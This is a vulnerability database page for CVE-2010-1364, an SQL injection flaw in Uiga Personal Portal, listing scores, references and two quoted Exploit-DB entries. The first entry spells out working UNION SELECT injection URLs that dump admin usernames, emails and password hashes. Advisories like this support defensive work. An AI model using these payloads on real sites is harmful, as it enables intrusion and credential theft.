CVE-2010-1364
published 2010-04-13CVE-2010-1364: SQL injection vulnerability in index.php in Uiga Personal Portal, as downloaded on 20100301, allows remote attackers to execute arbitrary SQL commands via the…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.98%
57.8th percentile
SQL injection vulnerability in index.php in Uiga Personal Portal, as downloaded on 20100301, allows remote attackers to execute arbitrary SQL commands via the id parameter in a photos action. NOTE: some of these details are obtained from third party information.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Uiga Personal Portal - 'index.php' 'view' SQL Injection
exploitdb·2010-04-26
CVE-2010-1364 Uiga Personal Portal - 'index.php' 'view' SQL Injection
Uiga Personal Portal - 'index.php' 'view' SQL Injection
---
# Exploit Title: Uiga Personal Portal index.php (view) SQL Injection
Vulnerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Software Link :
http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork :
# Code :
Exploited Link :
http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'
Examples :
http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr
oup_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--
http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema
il,0x3a,admin_password),8,9,10,11+from+tbl_admin--
Important: Sometimes the table
Exploit-DB
Uiga Personal Portal - 'index.php' SQL Injection
exploitdb·2010-02-28
CVE-2010-1364 Uiga Personal Portal - 'index.php' SQL Injection
Uiga Personal Portal - 'index.php' SQL Injection
---
----------------------------Information------------------------------------------------
+Name : Uiga Personal Portal index.php SQL Injection
+Autor : Easy Laster
+Date : 28.02.2010
+Script : Uiga Personal Portal
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.
___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|
No writeups or analysis indexed.
http://packetstormsecurity.org/1002-exploits/uigapersonalportal-sql.txthttp://secunia.com/advisories/38757http://www.exploit-db.com/exploits/11599http://www.vupen.com/english/advisories/2010/0488http://packetstormsecurity.org/1002-exploits/uigapersonalportal-sql.txthttp://secunia.com/advisories/38757http://www.exploit-db.com/exploits/11599http://www.vupen.com/english/advisories/2010/0488
2010-04-13
Published